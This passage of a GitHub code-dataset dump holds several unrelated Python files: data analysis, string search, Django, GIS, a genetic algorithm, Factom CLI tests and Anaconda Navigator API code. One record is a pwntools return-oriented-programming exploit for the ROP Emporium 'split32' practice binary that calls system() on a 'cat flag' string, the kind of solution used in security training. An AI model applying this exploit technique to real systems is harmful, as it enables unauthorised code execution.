int(datum['F2'])> 6000:\n continue\n time_identical[sub].append(int(datum['F1'])-int(datum['F2']))\n else:\n if int(datum['B1']) > 6000 or int(datum['B2'])> 6000:\n continue\n time_identical[sub].append(int(datum['B1'])-int(datum['B2']))\n else:\n if 'F1' in datum:\n if int(datum['F1']) > 6000 or int(datum['B2'])> 6000:\n continue\n time_reverse[sub].append(int(datum['F1'])-int(datum['B2']))\n else:\n if int(datum['B1']) > 6000 or int(datum['F2'])> 6000:\n continue\n time_reverse[sub].append(int(datum['B1'])-int(datum['F2']))\n \n stats.append(list(correct_first.values()) + list(incorrect_second_correct_first_i.values()) + list(correct_second_incorrect_first_i.values()) + list(incorrect_second_correct_first_r.values()) + list(correct_second_incorrect_first_r.values()) + list(correct_first_i.values()) + list(correct_first_r.values()) + list(incorrect_first_i.values()) + list(incorrect_first_r.values() ))\n\n avg_stats.append([sum(list(correct_first.values())), \\\n sum(list(incorrect_second_correct_first_i.values())), \\\n sum(list(correct_second_incorrect_first_i.values())), \\\n sum(list(incorrect_second_correct_first_r.values())), \\\n sum(list(correct_second_incorrect_first_r.values())), \\\n sum(list(correct_first_i.values())), \\\n sum(list(correct_first_r.values())), \\\n sum(list(incorrect_first_i.values())), \\\n sum(list(incorrect_first_r.values()))])\n\n\n avg_stats = np.array(avg_stats).astype(float)\n count_stats = avg_stats.copy()\n\n incorrect_2_correct_1_i = avg_stats[:,1]/avg_stats[:,-4]\n correct_2_incorrect_1_i = avg_stats[:,2]/(avg_stats[:,-2])\n incorrect_2_correct_1_r = avg_stats[:,3]/avg_stats[:,-3]\n correct_2_incorrect_1_r = avg_stats[:,4]/(avg_stats[:,-1])\n\n avg_stats[:,1] = avg_stats[:,1]/avg_stats[:,-4]\n avg_stats[:,2] = avg_stats[:,2]/(avg_stats[:,-2])\n avg_stats[:,3] = avg_stats[:,3]/avg_stats[:,-3]\n avg_stats[:,4] = avg_stats[:,4]/(avg_stats[:,-1])\n avg_stats[:,0] = avg_stats[:,0]/72\n avg_stats[:,5] = avg_stats[:,5]/36\n avg_stats[:,6] = avg_stats[:,6]/36\n avg_stats[:,7] = avg_stats[:,7]/36\n avg_stats[:,8] = avg_stats[:,8]/36\n\n difference_i = incorrect_2_correct_1_i - correct_2_incorrect_1_i\n difference_r = incorrect_2_correct_1_r - correct_2_incorrect_1_r\n\n t_r = np.mean(difference_r)/(np.std(difference_r)/math.sqrt(15))\n t_i = np.mean(difference_i)/(np.std(difference_i)/math.sqrt(15))\n\n time_diff_identical = []\n time_diff_reverse = []\n for sub in data:\n time_diff_identical.append(np.mean(time_identical[sub]))\n time_diff_reverse.append(np.mean(time_reverse[sub]))\n\n time_data = [np.mean(time_diff_identical), np.mean(time_diff_reverse), np.std(time_diff_identical), np.std(time_diff_reverse)]\n pickle.dump(avg_stats, open('accuracies_data.pkl', 'wb'))\n pickle.dump(time_data, open('time_diff_data.pkl', 'wb'))\n with open('data_acc.csv', 'a+') as csvfile:\n datawriter = csv.writer(csvfile, delimiter=',')\n datawriter.writerow(['Data'])\n datawriter.writerow(['correct_first', 'incorrect_second_correct_first_i', 'correct_second_incorrect_first_i', 'incorrect_second_correct_first_r', 'correct_second_incorrect_first_r', 'correct_first_i', 'correct_first_r', 'incorrect_first_i', 'incorrect_first_r'])\n\n for i in range(len(avg_stats)): \n with open('data_acc.csv', 'a+') as csvfile:\n datawriter = csv.writer(csvfile, delimiter=',')\n avg_stats[i] = [round(x,2) for x in avg_stats[i]]\n datawriter.writerow(avg_stats[i])\n\n return avg_stats, time_data\n\n\nif __name__ == \"__main__\" :\n stats = get_data_stats()\n print(stats)\n\n\n\n","repo_name":"asneha213/paired-associate-learning","sub_path":"analyze_data.py","file_name":"analyze_data.py","file_ext":"py","file_size_in_byte":6733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28434683019","text":"arquivo = open(\"1.txt\", \"r\");\n\nnome = input(\"Digite um nome de aluno para sua busca: \");\nnomes = arquivo.read();\nfor linha in nomes:\n if(nome.lower() in nomes.lower().strip()):\n print(\"O aluno está matriculado\");\n else:\n print(\"Aluno não matriculado\");\n\n break;\n\narquivo.close(); \n","repo_name":"ggmacedo/aprendendopython","sub_path":"aula11/ex3.py","file_name":"ex3.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"1922876919","text":"import time\n\n\ndef naive(text, pattern):\n start = time.time()\n\n n = len(text)\n m = len(pattern)\n\n res_pos = []\n\n for i in range(n - m - 1):\n if text[i:(i+m)] == pattern:\n res_pos.append(i)\n\n stop = time.time()\n return res_pos, stop - start\n\n\ndef rabin_karp(text, pattern, d, q):\n\n n = len(text)\n m = len(pattern)\n p = 0\n t = 0\n\n result = []\n\n h = pow(d, m - 1) % q\n for i in range(m):\n p = (d*p + ord(pattern[i])) % q\n t = (d*t + ord(text[i])) % q\n\n start = time.time()\n\n for s in range(n - m + 1):\n if p == t:\n if text[s:s+m] == pattern:\n result.append(s)\n\n if s < n - m:\n t = (d * (t-ord(text[s])*h) + ord(text[s+m])) % q\n\n stop = time.time()\n return result, stop - start\n\n\ndef rb1(text, pattern, d):\n pows = [1]\n for i in range(1, len(text)):\n pows.append(pows[i - 1] * d)\n\n\ndef get_prefixs(pattern):\n m = len(pattern)\n pi = [0]\n\n for i in range(1, m):\n k = pi[i - 1]\n while k > 0 and pattern[k] != pattern[i]:\n k = pi[k - 1]\n if pattern[k] == pattern[i]:\n k += 1\n pi.append(k)\n\n return pi\n\n\ndef kmp(text, pattern):\n start = time.time()\n\n n = len(text)\n m = len(pattern)\n q = 0\n results = []\n\n pi = get_prefixs(pattern)\n\n for i in range(n):\n while q > 0 and pattern[q] != text[i]:\n q = pi[q]\n if pattern[q] == text[i]:\n q += 1\n if q == m:\n results.append(i - m + 1)\n q = pi[q - 1]\n\n stop = time.time()\n return results, stop - start\n","repo_name":"MikhailMurashov/Find_substring","sub_path":"algs.py","file_name":"algs.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17402750838","text":"from goingspare.utils import render_to_response_context\nfrom django.db import transaction\n\n@transaction.commit_on_success\ndef index(request):\n userprofile = request.user.get_profile()\n notifications = request.user.get_profile().notification_set.all()\n notifications.filter(read=False).update(read=True)\n return render_to_response_context(request,\n 'notifications/index.html',\n {'notifications': notifications})\n","repo_name":"Joeboy/django-sharestuff","sub_path":"goingspare/notifications/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"28051869039","text":"###########################\n## ROUTE TYPE STATISTICS ##\n###########################\n\n# Purpose: Compute the percentage of each route type that is present in a\n# GTFS dataset and print results to the console\n\n# Load required libraries\nimport arcpy\nimport numpy as np\nimport SSDataObject as ssdo\n\n# Set inputs and outputs\ninFC = 'mpls_stpaul_shapes_projected'\noutFC = 'mpls_stpaul_shapes_projected_dissolved'\n\n# Need to dissolve on route_type alone to avoid double-counting parts of the\n# networks where multiple routes use the same road/rail infrastructure\nDissolve_management(\n inFC,\n outFC,\n dissolve_field = [\"route_type\"],\n statistics_fields = [[\"OBJECTID\", \"COUNT\"], [\"route_id\", \"COUNT\"]],\n multi_part = \"MULTI_PART\",\n unsplit_lines = \"DISSOLVE_LINES\"\n)\n\n# Convert output feature class to a spatial statistics data object\n# so we can perform pandas data manipulation on it\ndataobject = ssdo.SSDataObject(outFC)\n\n#dataobject.allFields # show available fields\ndataobject.obtainData(dataobject.oidName, ['ROUTE_TYPE', 'SHAPE_LENGTH'])\ndf = dataobject.getDataFrame()\n\n# Get total length of transit infrastructure\ntotal_length = df['SHAPE_LENGTH'].sum()\nprint(\"TOTAL LENGTH: \" + str(total_length))\n\n# Compute percent of total that each route type represents\ndf['PERCENT'] = df['SHAPE_LENGTH'] / total_length * 100\n\nprint(df)\n","repo_name":"linkalis/GTFS_analysis_scripts","sub_path":"route_type_stats.py","file_name":"route_type_stats.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32293805","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun May 26 19:16:16 2019\n\n@author: Jolin\n\"\"\"\n\nimport random\nimport numpy as np\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.metrics import roc_auc_score\nimport pandas as pd\n\ndef ga_main(kfold,x_train_s,y_train_s,x_val,y_val):\n population_size=10\n chromosome_length=14\n cof=['age_interval','admission_type_EMERGENCY','admission_type_ELECTIVE','admission_type_URGENT','aids','hem','mets']\n stats_list=['min','max','minmax','mean','std','stdmean','median','qua25','qua75','qua2575','mode','skew','kurt','first']\n pc=0.6\n pm=0.1\n population=pop=species_origin(population_size=population_size,chromosome_length=chromosome_length) \n now_best_indiv=list() #迄今为止最好的个体\n now_best_fitness=[random.random()*5 for _ in range(50)] #迄今为止最好的适应度\n all_best_fitness=list() #存储每一代最好的适应度\n all_best_indiv=list() #存储每一代最好的个体\n n=1;\n f_res_n=[]\n f_res_nowbest=[]\n f=open(r'E:/lml_dataget/v3/random80/guocheng_'+str(kfold)+'.txt','a',encoding='utf-8')\n while (np.std(now_best_fitness[-50:])>0.001):\n #计算种群的适应度\n function1=function(population=population,x_train_s=x_train_s,y_train_s=y_train_s,x_val=x_val,y_val=y_val,cof=cof,stats_list=stats_list)\n fitness1=fitness(function1)\n #求种群中最好的个体以及对应的适应度值\n best_individual,best_fitness=best(population,fitness1)\n all_best_indiv.append(best_individual)\n all_best_fitness.append(best_fitness)\n nowbestfit=max(all_best_fitness)\n nowbestindv=all_best_indiv[all_best_fitness.index(max(all_best_fitness))]\n now_best_fitness.append(nowbestfit)\n now_best_indiv.append(nowbestindv) \n f.write('----------第'+str(n)+'次的结果--------------'+':::'+str([best_individual,best_fitness])+'\\n')\n f.write('----------目前最好的结果--------------'+':::'+str([nowbestindv,nowbestfit])+'\\n')\n print('----------第'+str(n)+'次的结果--------------'+'\\n')\n print(str([best_individual,best_fitness]));\n print('----------目前最好的结果--------------'+'\\n')\n print(str([nowbestindv,nowbestfit]));\n f_res_n.append([n,best_individual,best_fitness])\n f_res_nowbest.append([n,nowbestindv,nowbestfit])\n selection(population,fitness1,pop)#选择\n crossover(population,pc,pop)#交配\n mutation(population,pm)#变异\n n=n+1;\n if(n>300):\n break;\n f_res_n_df=pd.DataFrame(f_res_n,columns=['no','best_individual','best_fitness'])\n f_res_nowbest_df=pd.DataFrame(f_res_nowbest,columns=['no','best_individual_now','best_fitness_now'])\n f_res_n_df.to_csv(r'E:\\lml_dataget\\v3\\random80\\\\'+str(kfold)+'_flod_res.csv',index=False,encoding='utf-8-sig')\n f_res_nowbest_df.to_csv(r'E:\\lml_dataget\\v3\\random80\\\\'+str(kfold)+'_flod_res_nowbest.csv',index=False,encoding='utf-8-sig')\n f.close()\n return [f_res_n,f_res_nowbest]\n\ndef species_origin(population_size,chromosome_length): \n population=[[]] \n while(len(population)<=population_size):\n temporary=[]\n for j in range(chromosome_length): \n temporary.append(random.randint(0,1))\n# if(sum(temporary)==7):\n population.append(temporary) \n #将染色体添加到种群中 \n return population[1:]\n \ndef function(population,x_train_s,y_train_s,x_val,y_val,cof,stats_list):\n function1=[]\n coff=cof\n for ii in range(len(population)):\n indiv=population[ii]\n id1 = [i for i,x in enumerate(indiv) if x==1]\n stats=[stats_list[i] for i in id1]\n for sts in stats:\n for column in x_train_s.columns:\n if(sts == column.split('_')[0]):\n coff.append(column)\n \n x_train_ss=pd.DataFrame(x_train_s,columns=x_train_s.columns)[coff]\n y_train_ss=y_train_s\n x_vall=x_val[coff]\n y_vall=y_val\n \n rf=RandomForestClassifier(random_state=42,n_estimators=50)\n rf.fit(x_train_ss,y_train_ss)\n preds_rf=rf.predict_proba(x_vall)\n res=roc_auc_score(y_vall,preds_rf[:,1])\n function1.append(res*100)\n return function1\n \ndef fitness(function1):\n fitness1=[]\n mf=0\n for i in range(len(function1)):\n if(function1[i]+mf>0):\n temporary=mf+function1[i]\n else:\n temporary=0.0\n # 如果适应度小于0,则定为0\n fitness1.append(temporary)\n #将适应度添加到列表中\n return fitness1\n \n #计算适应度和\ndef sum(fitness1):\n total=0\n for i in range(len(fitness1)):\n total+=fitness1[i]\n return total\n \n #计算适应度斐波纳挈列表,这里是为了求出累积的适应度\ndef cumsum(fitness1):\n for i in range(len(fitness1)-2,-1,-1):\n # range(start,stop,[step])\n # 倒计数\n total=0\n j=0\n while(j<=i):\n total+=fitness1[j]\n j+=1\n #这里是为了将适应度划分成区间\n fitness1[i]=total\n fitness1[len(fitness1)-1]=1\n \n #3.选择种群中个体适应度最大的个体\ndef selection(population,fitness1,pop):\n new_fitness=[]\n #单个公式暂存器\n total_fitness=sum(fitness1)\n #将所有的适应度求和\n for i in range(len(fitness1)):\n new_fitness.append(fitness1[i]/total_fitness)\n #将所有个体的适应度概率化,类似于softmax\n cumsum(new_fitness)\n #将所有个体的适应度划分成区间\n ms=[]\n #存活的种群\n pop_len=len(population)\n #求出种群长度\n #根据随机数确定哪几个能存活\n \n for i in range(pop_len):\n ms.append(random.random())\n # 产生种群个数的随机值\n ms.sort()\n # 存活的种群排序\n fitin=0\n newin=0\n new_pop=population\n \n #轮盘赌方式\n while newinbestfitness):\n \n bestfitness=fitness1[i]\n bestindividual=population[i]\n \n return [bestindividual,bestfitness]\n ","repo_name":"MenglinLu/Patient-representation-based-on-statistics","sub_path":"model/ga_1.py","file_name":"ga_1.py","file_ext":"py","file_size_in_byte":8481,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"32158810403","text":"from pwn import *\n\nt = process(\"./split32\")\n\ngdb_cmd = [\"c\"] # \"b *0x08048653\"\n\ncontext.terminal = [\"gnome-terminal\", \"-e\"]\ngdb.attach(t, gdbscript='\\n'.join(gdb_cmd))\n\nsystem_plt_address = 0x08048430\ncat_flag_address = 0x0804a030\n# buf = cyclic(120, n=4)\noffset = cyclic_find(\"laaa\", n=4)\nprint(offset)\nbuf = \"A\"*offset\nbuf += p32(system_plt_address)\nbuf += \"B\"*4\nbuf += p32(cat_flag_address)\n\nt.recvuntil('\\n>')\nt.sendline(buf)\n\nt.interactive()","repo_name":"wr47h/ROP-Emporium-Solutions","sub_path":"split/exploit.py","file_name":"exploit.py","file_ext":"py","file_size_in_byte":447,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"23201530043","text":"# Checking hash of a file\r\nimport hashlib\r\n\r\npublished_hash = '9f47eda37229f68eee03b24b9748937c7dc3868f906e8ba69fbcbdd3bc5dc3e2'\r\n\r\nfilename = 'colorama-0.4.4-py2.py3-none-any.whl'\r\n\r\nwith open(filename, 'rb') as downloaded_file:\r\n contents = downloaded_file.read()\r\n\r\nfile_hash = hashlib.sha256(contents).hexdigest()\r\nprint(file_hash == published_hash)\r\n","repo_name":"adexstack/tim-python","sub_path":"BinaryFiles/sha_checksum.py","file_name":"sha_checksum.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16240864597","text":"import unittest, os, time\n\nfrom nose.plugins.attrib import attr\nfrom api_objects.api_objects_factomd import APIObjectsFactomd\nfrom cli_objects.cli_objects_chain import CLIObjectsChain\nfrom cli_objects.cli_objects_create import CLIObjectsCreate\nfrom cli_objects.cli_objects_identity_wallet import CLIObjectsIdentityWallet\nfrom helpers.helpers import create_random_string, read_data_from_json\nfrom helpers.general_test_methods import wait_for_ack, wait_for_chain_in_block, fund_entry_credit_address, wait_for_entry_in_block\n\n@attr(fast=True)\nclass CLITestsIdentityWallet(unittest.TestCase):\n cli_chain = CLIObjectsChain()\n cli_create = CLIObjectsCreate()\n cli_identity = CLIObjectsIdentityWallet()\n api_factomd = APIObjectsFactomd()\n data = read_data_from_json('shared_test_data.json')\n blocktime = api_factomd.get_current_minute()['directoryblockinseconds']\n\n TIME_TO_WAIT = 5\n\n\n def test_list_all_identity_keys(self):\n newkey = self.cli_identity.new_identity_key()\n keylist = (self.cli_identity.list_identity_keys()).split()\n self.assertTrue(newkey in keylist, \"Testcase Failed\")\n\n def test_rm_identity_keys(self):\n newkey = self.cli_identity.new_identity_key()\n self.cli_identity.rm_identity_key(newkey)\n keylist = (self.cli_identity.list_identity_keys()).split()\n self.assertFalse(newkey in keylist, \"Testcase Failed\")\n\n def test_make_chain_and_check_chainhead(self):\n chainid = self.compose_identity_chain()\n self.confirm_chain_in_blockchain(chainid)\n\n def compose_identity_chain(self):\n self.entry_credit_address100 = fund_entry_credit_address(100)\n data = create_random_string(1024).encode()\n path = os.path.join(os.path.dirname(__file__), self.data['test_file_path'])\n name_1 = create_random_string(5)\n name_2 = create_random_string(5)\n names_list = ['-n', name_1, '-n', name_2]\n chain_flag_list = ['-f', '-C']\n key1 = self.cli_identity.new_identity_key()\n key2 = self.cli_identity.new_identity_key()\n key3 = self.cli_identity.new_identity_key()\n key_list = ['-k',key1,'-k', key2, '-k', key3]\n\n\n chainid = self.cli_identity.add_identity_chain(self.entry_credit_address100, data, flag_list= chain_flag_list, external_id_list=names_list,\n public_key_list=key_list)\n return chainid\n\n def make_chain(self):\n self.entry_credit_address100 = fund_entry_credit_address(100)\n data = create_random_string(1024)\n path = os.path.join(os.path.dirname(__file__), self.data['test_file_path'])\n name_1 = create_random_string(5)\n name_2 = create_random_string(5)\n names_list = ['-n', name_1, '-n', name_2]\n chain_flag_list = ['-f', '-C']\n chainid = self.cli_chain.make_chain(self.entry_credit_address100, data, external_id_list=names_list, flag_list=chain_flag_list)\n return chainid\n\n def confirm_chain_in_blockchain(self,chainid):\n found = False\n for x in range(0, self.TIME_TO_WAIT):\n if 'Chain not yet included in a Directory Block' in self.cli_chain.get_allentries(chain_id=chainid):\n found = True\n break\n time.sleep(1)\n self.assertTrue(found, 'Chainhead is missing')\n for x in range(0, self.blocktime):\n if 'Chain not yet included in a Directory Block' not in self.cli_chain.get_allentries(chain_id=chainid):\n found = True\n break\n time.sleep(1)\n self.assertTrue(found, 'Chainhead not included in a Directory Block after 1 block')\n\n def test_compose_attribute(self):\n '''\n Create a new Identity Attribute Entry using the Entry Credits from the specified address. Optional output flags: -C ChainID. -E EntryHash. -T TxID.\n '''\n chainid = self.make_chain()\n self.confirm_chain_in_blockchain(chainid)\n receiver_chainid = self.compose_identity_chain()\n self.confirm_chain_in_blockchain(receiver_chainid)\n self.entry_credit_address100 = fund_entry_credit_address(100)\n self.heights = self.cli_chain.get_heights()\n directory_block_height = self.cli_chain.parse_transaction_data(self.heights)['DirectoryBlockHeight']\n self.keys = self.cli_identity.get_keys_at_height(receiver_chainid,directory_block_height)\n signerkey = self.cli_chain.parse_keys_data(self.keys,0)\n signer_chainid = receiver_chainid\n attributes = \"\\'[{\\\"key\\\": \\\"email\\\", \\\"value\\\": \\\"veena@abc.com\\\"}]\\'\"\n\n entry_text = self.cli_identity.add_attribute(chainid, receiver_chainid, signer_chainid, signerkey, attributes, self.entry_credit_address100)\n entry_text = entry_text.split('\\n')\n entry_hash = ((entry_text[-1]).split(\": \"))[1]\n wait_for_entry_in_block(entry_hash,chainid)\n\n self.assertIn('DBlockConfirmed',\n str(self.api_factomd.get_status(entry_hash,chainid)),\n 'Entry not arrived in block')\n\n def test_compose_attribute_endorsement(self):\n '''\n Create a new Endorsement Entry for the Identity Attribute at the given entry hash. Uses the Entry Credits from the specified address. Optional output flags: -C ChainID. -E EntryHash. -T TxID.\n '''\n\n #compose attribute\n chainid = self.make_chain()\n self.confirm_chain_in_blockchain(chainid)\n receiver_chainid = self.compose_identity_chain()\n self.confirm_chain_in_blockchain(receiver_chainid)\n self.entry_credit_address100 = fund_entry_credit_address(100)\n self.heights = self.cli_chain.get_heights()\n directory_block_height = self.cli_chain.parse_transaction_data(self.heights)['DirectoryBlockHeight']\n self.keys = self.cli_identity.get_keys_at_height(receiver_chainid,directory_block_height)\n signerkey = self.cli_chain.parse_keys_data(self.keys,0)\n signer_chainid = receiver_chainid\n attributes = \"\\'[{\\\"key\\\": \\\"email\\\", \\\"value\\\": \\\"veena@abc.com\\\"}]\\'\"\n\n entry_text = self.cli_identity.add_attribute(chainid, receiver_chainid, signer_chainid, signerkey, attributes, self.entry_credit_address100)\n entry_text = entry_text.split('\\n')\n entry_hash = ((entry_text[-1]).split(\": \"))[1]\n\n #compose attribute endorsement\n entry_text = self.cli_identity.add_attribute_endorsement(chainid,signer_chainid,signerkey,entry_hash,self.entry_credit_address100)\n entry_text = entry_text.split('\\n')\n entry_hash = ((entry_text[-1]).split(\": \"))[1]\n wait_for_entry_in_block(entry_hash,chainid)\n self.assertIn('DBlockConfirmed',\n str(self.api_factomd.get_status(entry_hash,chainid)),\n 'Entry not arrived in block')\n\n def test_key_replacement(self):\n '''\n Create a new Identity Key Replacement Entry using the Entry Credits from the specified address. The oldkey is replaced by the newkey, and signerkey (same or higher priority as oldkey) authorizes the replacement. Optional output flags: -C ChainID. -E EntryHash. -T TxID.\n :return:\n '''\n\n # compose identity\n chainid = self.compose_identity_chain()\n self.confirm_chain_in_blockchain(chainid)\n\n # inputs for cli add key replacement\n # fetch the height and keys of the chain id\n self.heights = self.cli_chain.get_heights()\n directory_block_height = self.cli_chain.parse_transaction_data(self.heights)['DirectoryBlockHeight']\n keys = self.cli_identity.get_keys_at_height(chainid,directory_block_height)\n signerkey = self.cli_chain.parse_keys_data(keys,0)\n oldkey = self.cli_chain.parse_keys_data(keys,2)\n\n self.entry_credit_address100 = fund_entry_credit_address(100)\n newkey = self.cli_identity.new_identity_key()\n\n # identity add key replacement\n entry_text = self.cli_identity.add_key_replacement(chainid,oldkey,newkey,signerkey,self.entry_credit_address100)\n entry_text = entry_text.split('\\n')\n entry_hash = ((entry_text[-1]).split(\": \"))[1]\n wait_for_entry_in_block(entry_hash,chainid)\n\n # fetch the height and keys of the chain id\n heights = self.cli_chain.get_heights()\n directory_block_height = self.cli_chain.parse_transaction_data(heights)['DirectoryBlockHeight']\n new_key_list = self.cli_identity.get_keys_at_height(chainid, directory_block_height)\n\n # fetch the key list and add it to the parsed key list\n parsed_key_list = []\n for i in range(0,3):\n parsed_key_list.append(self.cli_chain.parse_keys_data(new_key_list,i))\n\n #look for that new key in the new key list\n found = False\n for i in range(0,len(parsed_key_list)):\n if (str(parsed_key_list[i]) == str(newkey)):\n found = True\n break\n\n self.assertTrue(found, \"Testcase Failed\")\n","repo_name":"FactomProject/tests_python","sub_path":"cli_tests/cli_tests_identity_wallet.py","file_name":"cli_tests_identity_wallet.py","file_ext":"py","file_size_in_byte":9003,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42816351158","text":"from collections import OrderedDict\nimport json\nimport os\nimport tempfile\n\n# Third party imports\nfrom qtpy.QtCore import QObject, Signal\n\n# Local imports\nfrom anaconda_navigator.api.client_api import ClientAPI\nfrom anaconda_navigator.api.conda_api import CondaAPI\nfrom anaconda_navigator.api.download_api import DownloadAPI\nfrom anaconda_navigator.config import CONF\nfrom anaconda_navigator.static import images\n\n\nclass _AnacondaAPI(QObject):\n \"\"\"Anaconda Manager API process worker.\"\"\"\n\n sig_repodata_updated = Signal(object)\n sig_repodata_errored = Signal()\n\n def __init__(self):\n \"\"\"Anaconda Manager API process worker.\"\"\"\n super(_AnacondaAPI, self).__init__()\n\n # API's\n self.config = CONF\n self._conda_api = CondaAPI()\n self._client_api = ClientAPI()\n self._download_api = DownloadAPI()\n self.ROOT_PREFIX = self._conda_api.ROOT_PREFIX\n\n # Vars\n self._checking_repos = None\n self._data_directory = None\n self._files_downloaded = None\n self._repodata_files = None\n self._valid_repos = None\n\n # Expose some methods for convenient access. Methods return a worker\n self.conda_create = self._conda_api.create\n self.conda_create_yaml = self._conda_api.create_from_yaml\n self.conda_clone = self._conda_api.clone_environment\n self.conda_dependencies = self._conda_api.dependencies\n self.conda_get_condarc_channels = self._conda_api.get_condarc_channels\n self.conda_install = self._conda_api.install\n self.conda_remove = self._conda_api.remove\n self.conda_terminate = self._conda_api.terminate_all_processes\n self.conda_config_add = self._conda_api.config_add\n self.conda_config_remove = self._conda_api.config_remove\n self.pip_list = self._conda_api.pip_list\n self.pip_remove = self._conda_api.pip_remove\n\n # No workers are returned for these methods\n self.conda_clear_lock = self._conda_api.clear_lock\n self.conda_environment_exists = self._conda_api.environment_exists\n self.conda_get_envs = self._conda_api.get_envs\n self.conda_linked = self._conda_api.linked\n self.conda_linked_apps_info = self._conda_api.linked_apps_info\n self.conda_get_prefix_envname = self._conda_api.get_prefix_envname\n self.conda_package_version = self._conda_api.package_version\n self.conda_platform = self._conda_api.get_platform\n self.conda_load_proxy_config = self._conda_api.load_proxy_config\n\n # These download methods return a worker\n get_api_info = self._download_api.get_api_info\n is_valid_url = self._download_api.is_valid_api_url\n self.download = self._download_api.download\n self.download_is_valid_url = self._download_api.is_valid_url\n self.download_is_valid_api_url = is_valid_url\n self.download_get_api_info = lambda: get_api_info(\n self._client_api.get_api_url())\n self.download_is_valid_channel = self._download_api.is_valid_channel\n self.download_terminate = self._download_api.terminate\n\n # These client methods return a worker\n self.client_store_token = self._client_api.store_token\n self.client_remove_token = self._client_api.remove_token\n self.client_login = self._client_api.login\n self.client_logout = self._client_api.logout\n self.client_load_repodata = self._client_api.load_repodata\n self.client_prepare_packages_data = self._client_api.prepare_model_data\n self.client_user = self._client_api.user\n self.client_domain = self._client_api.domain\n self.client_set_domain = self._client_api.set_domain\n self.client_packages = self._client_api.packages\n self.client_multi_packages = self._client_api.multi_packages\n self.client_organizations = self._client_api.organizations\n self.client_load_token = self._client_api.load_token\n self.client_get_api_url = self._client_api.get_api_url\n self.client_set_api_url = self._client_api.set_api_url\n\n # No workers are returned for these methods\n m = self._client_api.get_logged_user_list_channels\n self.client_get_logged_user_list_channels = m\n\n # --- Helper methods\n # -------------------------------------------------------------------------\n def _set_repo_urls_from_channels(self, channels):\n \"\"\"\n Convert a channel into a normalized repo name including.\n\n Channels are assumed in normalized url form.\n \"\"\"\n repos = []\n sys_platform = self._conda_api.get_platform()\n\n for channel in channels:\n url = '{0}/{1}/repodata.json.bz2'.format(channel, sys_platform)\n repos.append(url)\n\n return repos\n\n def _check_repos(self, repos):\n \"\"\"Check if repodata urls are valid.\"\"\"\n self._checking_repos = []\n self._valid_repos = []\n\n for repo in repos:\n worker = self.download_is_valid_url(repo)\n worker.sig_finished.connect(self._repos_checked)\n worker.repo = repo\n self._checking_repos.append(repo)\n\n def _repos_checked(self, worker, output, error):\n \"\"\"Callback for _check_repos.\"\"\"\n if worker.repo in self._checking_repos:\n self._checking_repos.remove(worker.repo)\n\n if output:\n self._valid_repos.append(worker.repo)\n\n if len(self._checking_repos) == 0:\n self._download_repodata(self._valid_repos)\n\n def _repo_url_to_path(self, repo):\n \"\"\"Convert a `repo` url to a file path for local storage.\"\"\"\n repo = repo.replace('http://', '')\n repo = repo.replace('https://', '')\n repo = repo.replace('/', '_')\n\n return os.sep.join([self._data_directory, repo])\n\n def _download_repodata(self, checked_repos):\n \"\"\"Dowload repodata.\"\"\"\n self._files_downloaded = []\n self._repodata_files = []\n self.__counter = -1\n\n if checked_repos:\n for repo in checked_repos:\n path = self._repo_url_to_path(repo)\n self._files_downloaded.append(path)\n self._repodata_files.append(path)\n worker = self.download(repo, path)\n worker.url = repo\n worker.path = path\n worker.sig_finished.connect(self._repodata_downloaded)\n else:\n # Empty, maybe there is no internet connection\n # Load information from conda-meta and save that file\n path = self._get_repodata_from_meta()\n self._repodata_files = [path]\n self._repodata_downloaded()\n\n def _get_repodata_from_meta(self):\n \"\"\"Generate repodata from local meta files.\"\"\"\n path = os.sep.join([self.ROOT_PREFIX, 'conda-meta'])\n packages = os.listdir(path)\n meta_repodata = {}\n for pkg in packages:\n if pkg.endswith('.json'):\n filepath = os.sep.join([path, pkg])\n with open(filepath, 'r') as f:\n data = json.load(f)\n\n if 'files' in data:\n data.pop('files')\n if 'icondata' in data:\n data.pop('icondata')\n\n name = pkg.replace('.json', '')\n meta_repodata[name] = data\n\n meta_repodata_path = os.sep.join([self._data_directory,\n 'offline.json'])\n repodata = {'info': [],\n 'packages': meta_repodata}\n\n with open(meta_repodata_path, 'w') as f:\n json.dump(repodata, f, sort_keys=True,\n indent=4, separators=(',', ': '))\n\n return meta_repodata_path\n\n def _repodata_downloaded(self, worker=None, output=None, error=None):\n \"\"\"Callback for _download_repodata.\"\"\"\n if worker:\n self._files_downloaded.remove(worker.path)\n\n if worker.path in self._files_downloaded:\n self._files_downloaded.remove(worker.path)\n\n if len(self._files_downloaded) == 0:\n self.sig_repodata_updated.emit(list(set(self._repodata_files)))\n\n # --- Public API\n # -------------------------------------------------------------------------\n def set_data_directory(self, data_directory):\n \"\"\"Set the directory where repodata and metadata are stored.\"\"\"\n self._data_directory = data_directory\n\n def repodata_files(self, channels=None):\n \"\"\"\n Return the repodata paths based on `channels` and the `data_directory`.\n\n There is no check for validity here.\n \"\"\"\n if channels is None:\n channels = self.conda_get_condarc_channels()\n\n repodata_urls = self._set_repo_urls_from_channels(channels)\n\n repopaths = []\n\n for repourl in repodata_urls:\n fullpath = os.sep.join([self._repo_url_to_path(repourl)])\n repopaths.append(fullpath)\n\n return repopaths\n\n def update_repodata(self, channels=None):\n \"\"\"Update repodata from channels or use condarc channels if None.\"\"\"\n norm_channels = self.conda_get_condarc_channels(channels=channels,\n normalize=True)\n 